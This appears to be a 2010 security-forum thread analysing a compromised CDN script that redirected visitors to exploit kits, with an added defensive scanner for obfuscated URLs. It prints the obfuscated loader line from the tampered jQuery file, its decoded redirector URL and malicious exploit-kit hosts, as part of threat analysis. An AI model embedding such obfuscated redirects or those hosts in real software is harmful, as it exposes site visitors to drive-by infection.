Author Topic: external script from cdn.wibiya.com directs to exploit kits  (Read 3315 times)

April 01, 2010, 07:07:26 pm

SysAdMini

Today we looked at the referer pages of various Eleonore exploit kits.

Here is an example:
Code:
HTTP Referer:  Trafic:  Loads:  Percent:
www.mdinfo.com 3673 516 14.05 %
www.dl4all.com 2321 208 8.96 %
www.opensubtitles.org 2115 191 9.03 %
existenz.se 2111 196 9.28 %
rapidshare-catalog.com 1464 149 10.18 %
www.jpost.com 1150 113 9.83 %
www.uniquescoop.com 970 100 10.31 %
www.download.besplatnestvari.biz 754 72 9.55 %
sportske.jutarnji.hr 682 101 14.81 %
www.kadimdostlar.com 650 128 19.69 %
www.muzika.besplatnestvari.biz 541 67 12.38 %
kominek.blox.pl 503 50 9.94 %
ads2.atoll.gr 494 62 12.55 %
www.maxihayat.net 454 93 20.48 %
my-greek.blogspot.com 387 38 9.82 %
www.art2bempire.com 381 35 9.19 %
forum.ppcwarez.org 373 17 4.56 %
bingo.24sata.hr 369 46 12.47 %
www.opera-17.com 362 31 8.56 %
-- 348 50 14.37 %
www.tvfun.ma 347 77 22.19 %
boss-tv.pl 345 43 12.46 %
www.sparwelt.de 344 20 5.81 %
forum.esoft.in 335 25 7.46 %
www.knowledgesutra.com 330 30 9.09 %
www.livehealthclub.com 330 48 14.55 %
board.art2bempire.com 295 46 15.59 %
www.medioteka.net 286 28 9.79 %

I checked all referer pages, but didn't find iframes or obfuscated JavaScript code.
The only thing that is common on all those pages is an external script from cdn.wibiya.com.

e.g. hxxp://cdn.wibiya.com/Loaders/Loader_32026.js

This script downloads a JavaScript library from

Code:
cdn.wibiya.com/Scripts/jquery.min.js
This obfuscated file contains an instruction
Code:
return 'h3t>t3p7:E/7/>i>m3g3dNo7w7nNl3o7a>dEsN.7cNo3m3/3i>n>.7c>g7iN?N5N'.qF(/[NE\>73]/g, '')
which decodes to

Code:
http://imgdownloads.com/in.cgi?5
This URL redirects to

Code:
http://imgdownloads.com/in.cgi?2
which redirects to various exploit kits.

Some minutes ago it directed me to
Code:
carmup.com/lee/ (http://www.malwaredomainlist.com/mdl.php?search=carmup.com%2Flee%2F&colsearch=All&quantity=50)

Before it was
Code:
tpdoc.in/x/ (http://www.malwaredomainlist.com/mdl.php?search=tpdoc.in%2Fx%2F&colsearch=All&quantity=50)

But our members reported some more kits.
Ruining the bad guy's day
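
Added example, not part of the original posts: a small Node.js scanner for the obfuscation quoted above, a string literal passed through a character-class strip (the method name, `qF` in the loader, is treated as an arbitrary alias), which reports literals that only become a URL after decoding. The function name, the `SAMPLE` wrapper and its benign second line are constructed for illustration.

```javascript
// Added example, not code from the thread. Finds string literals that are
// passed through a character-class strip, e.g. '...'.qF(/[NE\>73]/g, ''),
// and reports those that only become a URL once the junk is removed.

// 'literal' . method ( /[class]/flags , '' ) ; the method name is not
// checked because the loader aliased it (qF).
const STRIP_CALL = /(['"])((?:\\.|(?!\1)[^\\])*)\1\s*\.\s*[\w$]+\s*\(\s*\/\[((?:\\.|[^\]\\])+)\]\/([gimsuy]*)\s*,\s*(['"])\5\s*\)/g;
const URL_LIKE = /^(?:https?:)?\/\/[a-z0-9.-]+\.[a-z]{2,}(?:[\/?#]\S*)?$/i;

// Constructed sample: the instruction quoted in the thread inside a
// hypothetical wrapper, plus a harmless strip call that must not be flagged.
const SAMPLE = String.raw`
function u() { return 'h3t>t3p7:E/7/>i>m3g3dNo7w7nNl3o7a>dEsN.7cNo3m3/3i>n>.7c>g7iN?N5N'.qF(/[NE\>73]/g, '') }
var label = 'a-b-c'.replace(/[-]/g, '');
`;

function findHiddenUrls(source) {
  const findings = [];
  for (const m of source.matchAll(STRIP_CALL)) {
    const [, , literal, charClass, flags] = m;
    let stripper;
    try {
      stripper = new RegExp('[' + charClass + ']', flags);
    } catch (e) {
      continue; // character class did not compile; not this pattern
    }
    // Escape sequences inside the literal (\x41 etc.) are not unescaped here.
    const decoded = literal.replace(stripper, '');
    if (URL_LIKE.test(decoded) && !URL_LIKE.test(literal)) {
      // The base is only used for protocol-relative results (//host/path).
      const host = new URL(decoded, 'http://base.invalid').hostname;
      findings.push({ offset: m.index, literal, decoded, host });
    }
  }
  return findings;
}

for (const f of findHiddenUrls(SAMPLE)) {
  console.log(`offset ${f.offset}: hidden URL ${f.decoded} (host ${f.host})`);
}
```

Comparing the reported host against the hosts a third-party script is expected to contact turns this into a simple integrity check for externally hosted libraries.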

April 02, 2010, 09:24:15 am
Reply #1

SysAdMini

wibiya.com has replaced the script with a clean file.

April 03, 2010, 10:35:12 am
Reply #2

Garlando

It's Sutra TDS, if you did not know that yet.

April 04, 2010, 05:16:07 pm
Reply #3

SysAdMini

Wibiya compromised again.

Code:
http://community.wibiya.com/wibiya/topics/wibya_toolbar_recongnized_as_virus
Quote
We've just fixed the problem,

We found the problem's origin and FIXED it, we scanned all of Wibiya's files and sources and everything is safe to use.

More info about this issue:
Apparently it was a security breach at our hosting provider that probably affected many companies. We're still working with our hosting provider to see how it can be prevented in the future.

Sorry for the inconvenience, please let us know if you encounter any similar issues from now on.